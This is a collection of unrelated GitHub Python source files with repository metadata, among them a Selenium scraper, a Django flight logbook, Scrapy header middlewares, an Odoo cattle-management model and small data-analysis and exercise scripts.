WebDriverWait(self.driver, 10).until(\n EC.element_to_be_clickable((By.ID, (\"onetrust-accept-btn-handler\")))\n ).click()\n except TimeoutException:\n pass\n page_height = self.driver.execute_script(\"return document.documentElement.scrollHeight\")\n while scroll_position <= page_height:\n self.driver.execute_script(f\"window.scrollTo(0, {scroll_position})\")\n sleep(randint(0, 5))\n scroll_position += 400\n\n def update_cookies(self, session: Session) -> None:\n ck = pickle.dumps(self.driver.get_cookies())\n now = datetime.now()\n self.record.counter = self.record.counter + 1\n self.record.last_update = now\n cookies = self.get_cookies(session)\n if not cookies:\n 
cookies_instance = self.model_cls(cookie=ck, domain=self.domain, profile_id=self.record.id)\n            session.add(cookies_instance)\n            logger.info(f"Cookies for {self.num} and {self.domain} were created")\n        else:\n            # get_cookies() returns the unpickled cookie list, so fetch the DB row itself to update it\n            row = (\n                session.query(Cookies)\n                .filter(Cookies.profile_id == self.num)\n                .filter(Cookies.domain == self.domain)\n                .first()\n            )\n            row.cookie = ck\n            logger.info(f"Cookies for {self.num} and {self.domain} were updated")\n","repo_name":"valentinepit/g_news","sub_path":"app/parser/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"34271463802","text":"import logging\n\nfrom discord_bot import DiscordBot\nfrom scraper import Scraper\n\nclass Store:\n    def __init__(self, name, css_selector, validator_url, urls_to_check):\n        self.name = name\n        self.css_selector = css_selector\n        self.validator_url = validator_url\n        self.urls_to_check = urls_to_check\n\n    def check_sanity(self):\n        soup = Scraper.fetch_url(self.validator_url)\n        found = soup.select(self.css_selector)\n        if found:\n            DiscordBot.send(f"{self.name} css selector is valid")\n            return True\n        else:\n            DiscordBot.send(f"{self.name} css selector is invalid")\n            return False\n\n    def check_availability(self):\n        for url in self.urls_to_check:\n            soup = Scraper.fetch_url(url)\n            found = soup.select(self.css_selector)\n            if found:\n                DiscordBot.send(f"In Stock: {url}")\n            else:\n                logging.info(f"{self.name} no stock")\n","repo_name":"kaili302/MyOnlineShoppingTool","sub_path":"store.py","file_name":"store.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
{"seq_id":"36805893203","text":"'''\nBen Langley\nOctober 24th, 2018\n\nVentera Dev Challenge\n\nDescription: This file reads in the JSON (in the new format), analyzes certain metrics,\nand displays the results in the command line for the user\n'''\nfrom transform import transform\n\n######################\n## Global Variables ##\n######################\ninputJSONFile = "data.json"\noutputJSONFile = "transformed.json"\n\n'''\nClass to wrap the vendor data\n\nThese methods were added to the class because most of them\nrequired the data attribute, so I abstracted it away into this\nnew class to store the Vendor Data\n'''\nclass VendorData(object):\n\n\t'''\n\tInitialize the vendor data instance with the given data\n\t'''\n\tdef __init__(self, data):\n\t\tself.data = data\n\n\t'''\n\tGet a list of unique vendor names\n\n\treturns list of unique vendors\n\t'''\n\tdef getVendorNames(self):\n\t\tnames = []  # List to store names in\n\n\t\t# Loop over each transaction and get the vendor name\n\t\tfor item in self.data:\n\t\t\tnames.append(item["vendor"])\n\n\t\t# Remove duplicates by making a set then back to a list\n\t\treturn list(set(names))\n\n\n\t'''\n\tCompute the total revenue of each vendor\n\n\treturns dictionary of each vendor and their total revenue\n\t'''\n\tdef computeTotalRevenueByVendor(self):\n\t\t# Initialize the revenue data structure\n\t\trevenue = {}\n\t\tfor vendor in self.getVendorNames():\n\t\t\trevenue[vendor] = 0\n\n\t\t# Compute total revenue of all vendors\n\t\tfor transaction in self.data:\n\t\t\tvendor = transaction["vendor"]\n\n\t\t\t# Get the transaction total revenue\n\t\t\tfor item in transaction["details"]:\n\t\t\t\trevenue[vendor] += item["revenue"]\n\n\t\treturn revenue\n\n\n\t'''\n\tGet the vendor with the highest revenue\n\n\trevenueDict - dictionary of total revenue by vendor\n\t\tOutput of computeTotalRevenueByVendor()\n\treturns the name of the vendor with the highest revenue\n\t'''\n\tdef getHeighestRevenueVendor(self, revenueDict):\n\t\t# Initialize the maximums\n\t\tmaxKey = ""\n\t\tmaxRevenue = 0\n\n\t\t# Find maximum value and return key by iterating over\n\t\t# each (vendor, revenue) pair in the dictionary\n\t\tfor vendor, revenue in revenueDict.items():\n\t\t\tif revenue > maxRevenue:\n\t\t\t\tmaxRevenue = revenue\n\t\t\t\tmaxKey = vendor\n\n\t\t# Return vendor of the maximum revenue\n\t\treturn maxKey\n\n\n\t'''\n\tCompute the total number of sales for a specific item\n\n\titemKey - the exact key to match for computing number of items sold\n\treturns the total number of items sold for the given item key\n\t'''\n\tdef computeItemsSold(self, itemKey):\n\t\t# Initialize the items sold counter\n\t\ttotal = 0\n\n\t\t# Iterate over each transaction\n\t\tfor transaction in self.data:\n\t\t\t# Iterate over each item in the transaction\n\t\t\tfor item in transaction["details"]:\n\t\t\t\tif item["item"] == itemKey:\n\t\t\t\t\ttotal += item["quantity"]\n\n\t\treturn total\n\n\n\t'''\n\tFind the customer who bought the most of a specific item in a given month\n\n\titemKey - the exact key to match for the item to find the customer for\n\tmonth - the integer month to verify transactions in\n\treturns the customerID who bought the most of the item given by itemKey\n\t'''\n\tdef customerBoughtMostItem(self, itemKey, month):\n\t\t# Initialize a dictionary of customers to store ID and matching items bought\n\t\tcustomersDict = {}\n\n\t\t# Iterate over each transaction to populate the customers dict\n\t\tfor transaction in self.data:\n\t\t\tcustomerID = transaction["customerID"]\n\t\t\t# Verify the month is correct\n\t\t\ttrans_month = int(transaction["date"][0:2])\n\t\t\tif trans_month == month:\n\t\t\t\t# Continue checking for the item in the transaction\n\t\t\t\tfor item in transaction["details"]:\n\t\t\t\t\t# Verify correct item\n\t\t\t\t\tif item["item"] == itemKey:\n\t\t\t\t\t\t# Update the customer dict\n\t\t\t\t\t\tif customerID in customersDict:\n\t\t\t\t\t\t\tcustomersDict[customerID] += item["quantity"]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcustomersDict[customerID] = item["quantity"]\n\n\t\t# Find the customer with the max\n\t\tmaxCustomer = ""\n\t\tmaxItems = 0\n\n\t\t# Find maximum value and return key by iterating over\n\t\t# each (customer, items count) pair in the dictionary\n\t\tfor customer, items in customersDict.items():\n\t\t\tif items > maxItems:\n\t\t\t\tmaxItems = items\n\t\t\t\tmaxCustomer = customer\n\n\t\t# Return customer of the maximum items bought\n\t\treturn maxCustomer\n\n\n'''\nMain function to run the data provided for the challenge\n'''\ndef main():\n\t# Get the data in the transformed form\n\tdata = transform(inputJSONFile, outputJSONFile)\n\n\t# Create the Vendor Data object\n\tvendor_data = VendorData(data)\n\tvendor_revenue = vendor_data.computeTotalRevenueByVendor()\n\n\t# Print the challenge-specific data\n\tprint("Total Revenue: ", sum(vendor_revenue.values()))\n\tprint("Vendor with Highest Revenue: ", vendor_data.getHeighestRevenueVendor(vendor_revenue))\n\tprint("Quantity of Hats Sold: ", vendor_data.computeItemsSold("hat"))\n\tprint("Customer who Bought Most Ice (October): ", vendor_data.customerBoughtMostItem("ice", 10))\n\n# Run the 
method!\nmain()\n\n","repo_name":"venterachallenge/Langley_Dev_Challenge","sub_path":"analyze.py","file_name":"analyze.py","file_ext":"py","file_size_in_byte":4773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42953538330","text":"from awadb import AwaEmbedding\nfrom typing import Iterable, Any, List\nimport os\nimport numpy as np\n\nDEFAULT_MODEL_NAME = \"text-embedding-ada-002\"\n\nclass OpenAIEmbeddings(AwaEmbedding):\n def __init__(self):\n try:\n import openai\n except ImportError as exc:\n raise ImportError(\n \"Could not import openai python package. \"\n \"Please install it with `pip install openai`.\"\n ) from exc\n self.model = openai.Embedding\n self.tokenizer = None\n openai.api_key = os.environ[\"OPENAI_API_KEY\"]\n\n def Embedding(self, sentence):\n tokens = []\n if self.tokenizer != None:\n tokens = self.tokenizer.tokenize(sentence)\n else:\n tokens.append(sentence)\n ans = self.model.create(input = tokens[0], model = DEFAULT_MODEL_NAME)[\"data\"][0][\"embedding\"]\n return np.array(ans)\n\n def EmbeddingBatch(\n self,\n texts: Iterable[str],\n **kwargs: Any,\n ) -> List[List[float]]:\n results: List[List[float]] = []\n for text in texts:\n results.append(self.model.create(input = text, model = DEFAULT_MODEL_NAME)[\"data\"][0][\"embedding\"])\n return results","repo_name":"awa-ai/awadb","sub_path":"awadb/awa_embedding/openai.py","file_name":"openai.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":136,"dataset":"github-code","pt":"21"} +{"seq_id":"22168395304","text":"\"\"\"\nCommon functionality of training a network under different frameworks.\n\"\"\"\n\nimport os\n\nfrom kernelphysiology import commons\n\nfrom kernelphysiology.utils.path_utils import create_dir\n\n\ndef prepare_output_directories(dataset_name, network_name, optimiser,\n load_weights, experiment_name, framework):\n # preparing directories\n data_folder_path = os.path.join(commons.python_root, 'data')\n create_dir(data_folder_path)\n network_folder_path = os.path.join(data_folder_path, 'nets')\n create_dir(network_folder_path)\n framework_folder_path = os.path.join(network_folder_path, framework)\n create_dir(framework_folder_path)\n\n # organise the dataset according to their parents\n if 'wcs' in dataset_name:\n dataset_parent = 'wcs'\n elif 'voc' in dataset_name:\n dataset_parent = 'voc'\n dataset_name = dataset_name.replace('voc_', '')\n elif 'geetup' in dataset_name:\n dataset_parent = 'geetup'\n dataset_name = dataset_name.replace('geetup_', '')\n else:\n dataset_parent = ''.join([i for i in dataset_name if not i.isdigit()])\n dataset_parent_path = os.path.join(framework_folder_path, dataset_parent)\n\n create_dir(dataset_parent_path)\n dataset_child_path = os.path.join(dataset_parent_path, dataset_name)\n create_dir(dataset_child_path)\n network_parent_path = os.path.join(dataset_child_path, network_name)\n create_dir(network_parent_path)\n network_dir = os.path.join(network_parent_path, optimiser)\n create_dir(network_dir)\n if load_weights is not None and load_weights is True:\n f_s_dir = os.path.join(network_dir, 'fine_tune')\n else:\n f_s_dir = os.path.join(network_dir, 'scratch')\n create_dir(f_s_dir)\n save_dir = os.path.join(f_s_dir, experiment_name)\n create_dir(save_dir)\n return 
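The two find-the-maximum loops in the VendorData class above can each be collapsed with max() and a key function; the empty-dict guard preserves the record's behaviour of returning an empty string. A sketch with toy data:

def highest_revenue_vendor(revenue: dict) -> str:
    """Vendor with the largest total revenue; '' for an empty dict."""
    return max(revenue, key=revenue.get) if revenue else ""

assert highest_revenue_vendor({"A": 120, "B": 340, "C": 75}) == "B"
assert highest_revenue_vendor({}) == ""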
save_dir\n","repo_name":"ArashAkbarinia/kernelphysiology","sub_path":"python/src/kernelphysiology/dl/utils/prepare_training.py","file_name":"prepare_training.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"25723867752","text":"from django.urls import path\n#from rest_framework.routers import DefaultRouter\n# from watchlist_app.api.views import movie_list, movie_details\nfrom xtank.api.views import (pitch_list, pitch_detail,counteroffer)\n\n\n\nurlpatterns = [\n path('pitches/', pitch_list, name='pitch-list'),\n path('pitches//', pitch_detail, name='pitch-detail'),\n path('pitches//makeOffer', counteroffer, name='counteroffer'),\n\n \n\n]","repo_name":"Shalvi-Singhal/xharktank-backend","sub_path":"XharkTank/xtank/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42630988673","text":"# -*- coding: utf-8 -*-\n\n# Define here the models for your spider middleware\n#\n# See documentation in:\n# https://doc.scrapy.org/en/latest/topics/spider-middleware.html\n\n\n\n\n'''\n中间件处理图片下载的防盗链\n'''\nclass ImageHotlinkingmiddleware(object):\n def process_request(self,request,spider):\n referer = request.meta.get('referer',None)\n if referer:\n request.headers['referer'] = referer\n else:\n request.headers['referer'] = 'http://i.meizitu.net'\n\n\nimport random\nfrom .useragent import agents\nfrom scrapy.downloadermiddlewares.useragent import UserAgentMiddleware\n'''\n代理\n'''\nclass UserAgentmiddleware(UserAgentMiddleware):\n def process_request(self, request, spider):\n agent = random.choice(agents)\n request.headers['User-Agent'] = agent","repo_name":"SmallBlackBeans/pythonPractice","sub_path":"meizi_scrapy/meizi_scrapy/middlewares.py","file_name":"middlewares.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9984250122","text":"# ch20_50.py\nimport pandas as pd\n\nitems = ['軟體','書籍','國際證照']\nJan = [200, 150, 80]\nFeb = [220, 180, 100]\nMarch = [160, 200, 110]\nApril = [100, 120, 150]\ndf = pd.DataFrame([Jan, Feb, March, April],\n columns = items,\n index = range(1,5))\ndf.to_excel(\"out20_50a.xlsx\")\ndf.to_excel(\"out20_50b.xlsx\", header=False, index=False)\n\n\n\n\n\n\n\n\n\n","repo_name":"June0608/Python","sub_path":"Program Examples/ch20/ch20_50.py","file_name":"ch20_50.py","file_ext":"py","file_size_in_byte":381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"38528437306","text":"# 24060_알고리즘 수업_병합정렬_mergesort\r\nimport sys\r\n\r\ndef msort(li):\r\n if len(li) <= 1:\r\n return li\r\n mid = (len(li)+1)//2\r\n l_li = li[:mid]\r\n r_li = li[mid:]\r\n\r\n l_li = msort(l_li)\r\n r_li = msort(r_li)\r\n\r\n s_li = []\r\n i, j = 0, 0\r\n while i < len(l_li) and j < len(r_li):\r\n if l_li[i] < r_li[j]:\r\n s_li.append(l_li[i])\r\n count.append(l_li[i])\r\n i += 1\r\n else:\r\n s_li.append(r_li[j])\r\n count.append(r_li[j])\r\n j += 1\r\n while i < len(l_li):\r\n s_li.append(l_li[i])\r\n count.append((l_li[i]))\r\n i += 1\r\n while j < len(r_li):\r\n s_li.append(r_li[j])\r\n count.append(r_li[j])\r\n j += 1\r\n return s_li\r\n\r\n\r\nn, k = map(int, sys.stdin.readline().split())\r\n\r\nnli = list(map(int, sys.stdin.readline().split()))\r\ncount = [] # 각 회차별 append되는 항목을 알기 위해 선언\r\nmsort(nli)\r\n\r\nif 
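The pandas example above writes two separate workbooks; to keep both variants in one file, to_excel can target sheets through an ExcelWriter. A short illustration with the same shape of data (an Excel engine such as openpyxl is assumed to be installed):

import pandas as pd

items = ['software', 'books', 'certificates']
df = pd.DataFrame([[200, 150, 80], [220, 180, 100]], columns=items, index=[1, 2])

with pd.ExcelWriter("out_combined.xlsx") as writer:
    df.to_excel(writer, sheet_name="with_labels")
    df.to_excel(writer, sheet_name="data_only", header=False, index=False)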
len(count) < k:\r\n print(-1)\r\nelse:\r\n print(count[k-1])\r\n\r\n\r\n\r\n","repo_name":"MinWoongL/Algorithm_Study","sub_path":"백준/Silver/24060. 알고리즘 수업 - 병합 정렬 1/알고리즘 수업 - 병합 정렬 1.py","file_name":"알고리즘 수업 - 병합 정렬 1.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"si","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74288801653","text":"import Race\n\nclass Angel(Race.Race):\n \n def __init__(self, exp = 0, amount = 1):\n self.name = \"Angel\" \n self.hp = 75\n self.atk = 5\n self.defense = 5\n self.atkSpd = 2\n self.intel = .55\n self.birRate = .05\n self.evo = 100\n self.exp = exp\n self.tier = 1\n self.amount = amount\n\n \nclass HighAngel(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"High Angel\" \n self.hp = 125\n self.atk = 9.5\n self.defense = 8.5\n self.atkSpd = 2\n self.intel = .65\n self.evo = 200\n self.exp = exp\n self.tier = 2\n self.amount = amount\n\nclass Throne(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Throne\" \n self.hp = 175\n self.atk = 13\n self.defense = 12\n self.atkSpd = 2\n self.intel = .75\n self.evo = 400\n self.exp = exp\n self.tier = 3\n self.amount = amount\n\nclass Cherubim(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Cherubim\" \n self.hp = 225\n self.atk = 16\n self.defense = 14\n self.atkSpd = 2\n self.intel = .85\n self.evo = 1750\n self.exp = exp\n self.tier = 4\n self.amount = amount\n\nclass Seraphim(Angel):\n def __init__(self, exp = 0, amount = 1):\n self.name = \"Seraphim\" \n self.hp = 400\n self.atk = 20\n self.defense = 16\n self.atkSpd = 2\n self.intel = .65\n self.exp = exp\n self.tier = 5\n self.amount = amount\n","repo_name":"areebia/Evolution","sub_path":"Angel.py","file_name":"Angel.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29932450840","text":"from django.contrib.admin import ModelAdmin, register\n\nfrom .models import Subscribe, User\n\n\n@register(User)\nclass UserAdmin(ModelAdmin):\n \"\"\"Админка пользователей.\"\"\"\n list_display = (\n 'username',\n 'email',\n 'first_name',\n 'last_name'\n )\n search_fields = ('username', 'email', 'first_name', 'last_name',)\n list_filter = ('email', 'username', )\n ordering = ('date_joined',)\n empty_value_display = '-'\n\n\n@register(Subscribe)\nclass SubscribeAdmin(UserAdmin):\n \"\"\"Админка подписок.\"\"\"\n list_display = (\n 'username',\n 'get_subscribe',\n )\n empty_value_display = '-'\n\n def get_subscribe(self, obj):\n return ',\\n'.join([p.username for p in obj.subscribe.all()])\n get_subscribe.short_description = 'подписки'\n","repo_name":"nasretdinovs/Foodgram","sub_path":"backend/users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6638116173","text":"import sys\n\nfrom fate_flow.web_server.pipeline_wrapper.test import prepare\n\nsys.path.append(\"./\")\nfrom fate_flow.web_server.pipeline_wrapper import wrapper\n\nCOMMON_PARAM = {\"transform_col_indexes\": None, \"transform_col_names\": [\"sex\"], \"need_run\":True}\nMODULE = \"OneHotEncoder\"\n\n\ndef base(jobid):\n global COMMON_PARAM\n wrapper.t_(jobid, MODULE, guest_only_param=COMMON_PARAM, host_only_param={10000:{\"transform_col_indexes\": None,\n \"transform_col_names\": [\"sex\"], \"need_run\":False}}, ml=False)\n\n\nif __name__ == \"__main__\":\n jid = 
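The merge-sort exercise above records every save into a module-level list, which makes the function awkward to reuse. A self-contained variant that closes over a local list instead; note the split point here is len // 2 rather than the record's (len + 1) // 2, so intermediate save orders can differ between the two implementations. The assert documents this implementation's behaviour.

def kth_saved_in_merge_sort(nums, k):
    """Value of the k-th element appended during merge sort, or -1 if there are fewer saves."""
    saves = []

    def msort(a):
        if len(a) <= 1:
            return a
        mid = len(a) // 2
        left, right = msort(a[:mid]), msort(a[mid:])
        merged = []
        i = j = 0
        while i < len(left) and j < len(right):
            if left[i] < right[j]:
                x = left[i]
                i += 1
            else:
                x = right[j]
                j += 1
            merged.append(x)
            saves.append(x)
        for x in left[i:] + right[j:]:
            merged.append(x)
            saves.append(x)
        return merged

    msort(list(nums))
    return saves[k - 1] if k <= len(saves) else -1

assert kth_saved_in_merge_sort([4, 5, 1, 3, 2], 7) == 3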
prepare.a_jobid()\n # jobid = \"202303080032028318590\"\n base(jid)\n","repo_name":"Seceum/SeceumFL","sub_path":"fateflow/python/fate_flow/web_server/pipeline_wrapper/test/one_hot_encoder.py","file_name":"one_hot_encoder.py","file_ext":"py","file_size_in_byte":688,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"21"} +{"seq_id":"70280374772","text":"import pandas as pd\n\ndef simplyfy_categories(data):\n # Fill missing categories with 'Unknown'\n data['Categories'].fillna('Unknown', inplace=True)\n\n # Simplify categories - we will only use the top-level category\n data['main_category'] = data['Categories'].apply(lambda x: x.split('|')[0].strip())\n\n # Apply one-hot encoding\n categories_encoded = pd.get_dummies(data['main_category'], prefix='category')\n data = pd.concat([data, categories_encoded], axis=1)\n return data\n","repo_name":"Austin-Fulbright/price_optv1.1","sub_path":"preprocessor/categories.py","file_name":"categories.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25084347321","text":"import sys\nimport argparse\nfrom clean_and_token_text import normalize_text\n\ndef deal_with_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('embed4', choices=['embed4classif', 'embed4ner'],\n help='choose between classification (removes all punct) or ner cleaning')\n parser.add_argument('--in_files', type=str, default=None,\n help='read a file to clean e.g. infile.txt')\n parser.add_argument('--out_file', type=str, default=None,\n help='file name to output the clean text e.g. outfile.txt')\n #parser.add_argument('--skip_n', default=1, type=int)\n args = parser.parse_args()\n return args\n\n\ndef main1():\n if sys.stdin.isatty():\n print('not piped me')\n else:\n # this is the case where we need to read\n text = sys.stdin.read()\n\n args = deal_with_args()\n if args.embed4 == 'embed4classif':\n clean_text = normalize_text(text, 'rm_punct')\n elif args.embed4 == 'embed4ner': \n clean_text = normalize_text(text)\n else:\n raise NotImplementedError('I dont know what the embed4 value means')\n print(clean_text)\n\nif __name__ == '__main__':\n main1()\n\n\n","repo_name":"lab156/arxivDownload","sub_path":"embed/run_normalize.py","file_name":"run_normalize.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"40364440314","text":"from odoo import models, fields, api, _\nfrom odoo.exceptions import ValidationError\nfrom dateutil.relativedelta import relativedelta\nfrom datetime import date,datetime\n\nclass sapi(models.Model):\n _name = \"sapi\"\n _description = \"Sapi\"\n _inherits = {\"res.partner\": \"partner_id\"}\n _inherit = ['mail.thread', 'mail.activity.mixin']\n _rec_name = 'first_name'\n\n @api.depends('date_of_birth')\n def onchange_age(self):\n for rec in self:\n if rec.date_of_birth:\n d1 = rec.date_of_birth\n d2 = datetime.today().date()\n rd = relativedelta(d2, d1)\n rec.age = str(rd.years) + \"y\" +\" \"+ str(rd.months) + \"m\" +\" \"+ str(rd.days) + \"d\"\n else:\n rec.age = \"No Date Of Birth!!\"\n\n partner_id = fields.Many2one('res.partner', 'Partner',\n required=True, ondelete=\"cascade\")\n patient_id = fields.Many2one('medical.patient')\n first_name = fields.Char('Name', size=128, translate=True)\n middle_name = fields.Char('Middle Name', size=128, translate=True)\n last_name = fields.Char('Last Name', 
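The category preprocessor above is compact but easy to misread without sample data. A tiny runnable illustration of the same fillna / split / get_dummies pipeline (without the in-place mutation):

import pandas as pd

data = pd.DataFrame({"Categories": ["Books | Fiction", None, "Music | Jazz"]})
data["Categories"] = data["Categories"].fillna("Unknown")
data["main_category"] = data["Categories"].apply(lambda x: x.split("|")[0].strip())
encoded = pd.get_dummies(data["main_category"], prefix="category")
print(pd.concat([data, encoded], axis=1).columns.tolist())
# ['Categories', 'main_category', 'category_Books', 'category_Music', 'category_Unknown']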
size=128, translate=True)\n date_of_birth = fields.Date('Birth Date')\n blood_group = fields.Selection([\n ('A+', 'A+ve'),\n ('B+', 'B+ve'),\n ('O+', 'O+ve'),\n ('AB+', 'AB+ve'),\n ('A-', 'A-ve'),\n ('B-', 'B-ve'),\n ('O-', 'O-ve'),\n ('AB-', 'AB-ve')\n ], string='Blood Group')\n sex = fields.Selection([\n ('m', 'Male'),\n ('f', 'Female'),\n ('o', 'Other')\n ], 'Gender', required=True, default='m')\n id_number = fields.Char('ID Card Number', size=64)\n user_id = fields.Many2one('res.users', 'User', ondelete=\"cascade\")\n category_id = fields.Many2one('op.category', 'Category')\n active = fields.Boolean(default=True)\n emergency_contact = fields.Many2one('res.partner', 'Emergency Contact')\n kandang_id = fields.Many2one('kandang.sapi.perah', 'Kandang')\n ibu_id = fields.Char('ID Sapi Ibu')\n ayah_id = fields.Char('ID Sapi Ayah')\n bobot = fields.Integer( string='Bobot Kg')\n panjang = fields.Integer('Panjang cm')\n kondisi_sapi = fields.Char('Kondisi Sapi')\n jenis_sapi = fields.Many2one('jenis.sapi.master', 'Jenis Sapi')\n eartag_id = fields.Char('ID Ear Tag')\n jenis_id = fields.Char(related='jenis_sapi.id_jenis_sapi', string=\"ID Jenis Sapi\")\n keterangan = fields.Text(related=\"jenis_sapi.keterangan\", string=\"Keterangan\")\n tgl_kematian = fields.Datetime('Tanggal Kematian')\n alasan = fields.Char('Alasan')\n sehat = fields.Boolean('Sehat')\n sakit = fields.Boolean('Sakit')\n hamil = fields.Boolean('Hamil')\n tdk_hamil = fields.Boolean('Tidak Hamil')\n state = fields.Selection([\n ('kering', 'Kering'),\n ('laktasi', 'Laktasi'),\n ], string='State', readonly=True, default='kering', required=True)\n ibu_titipan = fields.Char('Ibu Titipan')\n jenis_kehamilan = fields.Selection([\n ('ib', 'IB'),\n ('alami', 'Alami'),\n ], string='Jenis Kehamilan', required=False)\n height = fields.Integer('Tinggi cm')\n lgkr_perut = fields.Integer('Lingkar Perut cm')\n peternak_id = fields.Many2one('peternak.sapi', 'Peternak')\n age = fields.Char(compute=onchange_age, string=\"Age\", store=True)\n tipe = fields.Selection([\n ('1', 'Induk'),\n ('2', 'Dara'),\n ('3', 'Pedet Btn'),\n ], string='Tipe', required=True)\n posisi_eartag = fields.Selection([\n ('kanan', 'Kanan'),\n ('kiri', 'Kiri')\n ], string='Posisi Eartag')\n kembar = fields.Selection([\n ('y', 'Ya'),\n ('t', 'Tidak')\n ], string='Kembar')\n metoda = fields.Char('Metoda')\n tgl_identifikasi = fields.Date('Tanggal Identifikasi')\n kode_kelahiran = fields.Char('Kode Kelahiran')\n id_breed = fields.Char('ID Breed')\n nama_breed = fields.Char('Nama Breed')\n status_aktif = fields.Selection([\n ('a', 'Aktif'),\n ('ta', 'Tidak Aktif')\n ], string='Status Aktif')\n status_hidup = fields.Selection([\n ('h', 'Hidup'),\n ('m', 'Mati')\n ], string='Status Hidup')\n\n def func_kering(self):\n if self.state == 'kering':\n self.state = 'laktasi'\n\n def func_laktasi(self):\n if self.state == 'laktasi':\n self.state = 'kering'\n\n _sql_constraints = [(\n 'unique_gr_no',\n 'unique(gr_no)',\n 'GR Number must be unique per student!'\n )]\n\n @api.model\n def create(self, vals):\n vals['partner_id'] = self.env['res.partner'].create({\n 'name': vals.get('name'),\n 'is_sapi': True,\n 'company_type': 'person'\n }).id\n return super(sapi, self).create(vals)\n\n @api.onchange('first_name', 'middle_name', 'last_name')\n def _onchange_name(self):\n if not self.middle_name:\n self.name = str(self.first_name) + \" \" + str(\n self.last_name\n )\n else:\n self.name = str(self.first_name) + \" \" + str(\n self.middle_name) + \" \" + str(self.last_name)\n\n 
@api.constrains('birth_date')\n def _check_birthdate(self):\n for record in self:\n if record.birth_date > fields.Date.today():\n raise ValidationError(_(\n \"Birth Date can't be greater than current date!\"))\n\n def create_employee(self):\n for record in self:\n vals = {\n 'name': record.name,\n 'country_id': record.nationality.id,\n 'sex': record.sex,\n 'address_home_id': record.partner_id.id\n }\n emp_id = self.env['hr.employee'].create(vals)\n record.write({'emp_id': emp_id.id})\n record.partner_id.write({'partner_share': True, 'employee': True})\n","repo_name":"omikronkreatif/Kanjabungnew","sub_path":"addon_sapi/master_sapi/models/sapi.py","file_name":"sapi.py","file_ext":"py","file_size_in_byte":5814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22679159052","text":"# django imports\nfrom django.shortcuts import redirect, render\nfrom django.db.models import Sum\nfrom django.forms.models import model_to_dict\n\n# directory imports\nfrom .models import *\nfrom .forms import *\nfrom .utilities import helper_mytimedelta\n\n\n\ndef add_flight(request): \n myFlight = FlightForm()\n if request.method == \"POST\":\n myFlight = FlightForm(request.POST)\n print(myFlight)\n if myFlight.is_valid():\n \n myFlight.save() \n return redirect (\"logo:logbook\")\n context ={'myFlight':myFlight}\n return render(request, \"logo/add_flight.html\", context)\n\ndef update_flight(request,pk):\n flight = Flight.objects.get(id=pk)\n myFlight = FlightForm(instance=flight)\n \n if request.method ==\"POST\":\n myFlight = FlightForm(request.POST, instance=flight) \n if myFlight.is_valid(): \n myFlight.save()\n return redirect(\"logo:logbook\")\n return render(request, \"logo/add_flight.html\", {'myFlight':myFlight})\n \ndef delete_flight(request,pk):\n flight = Flight.objects.get(id = pk)\n if request.method == \"POST\":\n flight.delete()\n return redirect('/')\n context = {'flight' : flight}\n return render(request, \"logo/delete_flight.html\", context)\n\n\ndef summary(request):\n # Total Hours calculation\n ttltimeobj = Flight.objects.aggregate(Sum('sectorTime'))\n ttltimeval = ttltimeobj['sectorTime__sum']\n total_hours = helper_mytimedelta(ttltimeval)\n\n # Total Night calculation\n ttlnighttimeobj = Flight.objects.aggregate(Sum('nightTime'))\n ttlnighttimeval = ttlnighttimeobj['nightTime__sum']\n total_night = helper_mytimedelta(ttlnighttimeval)\n\n context = {'total_hours':total_hours,'total_night': total_night}\n return render(request, \"logo/summary.html\",context)\n\ndef logbook(request):\n flights = Flight.objects.all()\n context = {'flights':flights}\n return render(request, \"logo/logbook.html\", context)\n\n\ndef flight_detail(request,pk):\n # method:1\n flight = FlightForm(data = model_to_dict(Flight.objects.get(id=pk)))\n # field_names = [f.name for f in Flight._meta.get_fields()]\n # print(field_names)\n #method:2\n # flight = get_object_or_404(Flight,id=pk)\n # class FlightView(ModelForm):\n # class Meta:\n # model=Flight\n # fields=['flight_date','flightNum','tailNum',\n # 'pilot', 'depApt', 'arrApt',\n # 'depTime','arrTime','nightTime','pilotrole',\n # 'p1Time','p2Time','dayTime','sectorTime']\n\n # form = FlightView(instance = flight)\n\n return render(request,\"logo/flight_detail.html\", {\n 'flight':flight\n })\n\ndef aircraft(request):\n aircrafts = Aircraft.objects.all()\n aircraftform = AircraftForm()\n\n if request.method =='POST':\n aircraftform = 